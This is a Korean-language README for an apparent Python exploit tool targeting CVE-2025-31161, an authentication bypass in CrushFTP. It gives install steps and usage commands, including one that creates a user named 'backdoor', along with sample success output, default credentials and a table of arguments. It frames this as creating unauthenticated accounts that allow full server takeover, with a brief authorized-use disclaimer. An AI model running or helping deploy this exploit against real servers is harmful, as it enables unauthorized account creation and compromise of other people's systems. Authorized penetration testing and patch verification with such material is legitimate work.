
🛡️ CVE-2025-31161 - CrushFTP 사용자 생성 인증 우회 익스플로잇

이 Python 익스플로잇은 CVE-2025-31161에 취약한 CrushFTP 서버를 대상으로 합니다. 이 취약점은 인증되지 않은 사용자 계정 생성을 가능하게 하며, WebInterface에 조작된 XML 페이로드를 전송하여 잠재적으로 서버 전체를 장악할 수 있습니다.
이 도구는 교육 및 공인된 보안 테스트 목적으로만 사용해야 합니다.
소유하지 않았거나 명시적 테스트 권한이 없는 시스템에 무단으로 사용하는 것은 불법이며 비윤리적입니다.
requestscoloramaDebian/Ubuntu:
sudo apt update
sudo apt install python3 python3-pip -y
CentOS/RHEL:
sudo yum install python3 python3-pip -y
macOS (Homebrew 사용):
brew install python3
pip3 install requests colorama
python3 CVE-2025-31161.py --target_host <타겟_IP> [--port <포트>] [--target_user <관리자>] [--new_user <사용자명>] [--password <비밀번호>]
python3 CVE-2025-31161.py --target_host 192.168.1.100 --new_user backdoor --password P@ssw0rd!
[+] 페이로드 준비 중
[-] 대상 준비 중...
[-] 대상이 실행 중입니다
[+] 계정 생성 요청 전송 중
[!] 사용자가 성공적으로 생성되었습니다!
[+] 익스플로잇 완료! 이제 다음 계정으로 로그인할 수 있습니다:
[*] 사용자명: AuthBypassAccount
[*] 비밀번호: CorrectHorseBatteryStaple
Gaurav Bhattacharjee (G4UR4V007)
| 인수 | 설명 | 기본값 |
|---|
--target_host | (필수) 대상 IP 또는 도메인 | — |
--port | CrushFTP WebInterface 포트 | 8080 |
--target_user | 페이로드에 사용될 관리자 이름 | crushadmin |
--new_user | 새로 생성할 인증되지 않은 계정 | AuthBypassAccount |
--password | 새 사용자의 비밀번호 | CorrectHorseBatteryStaple |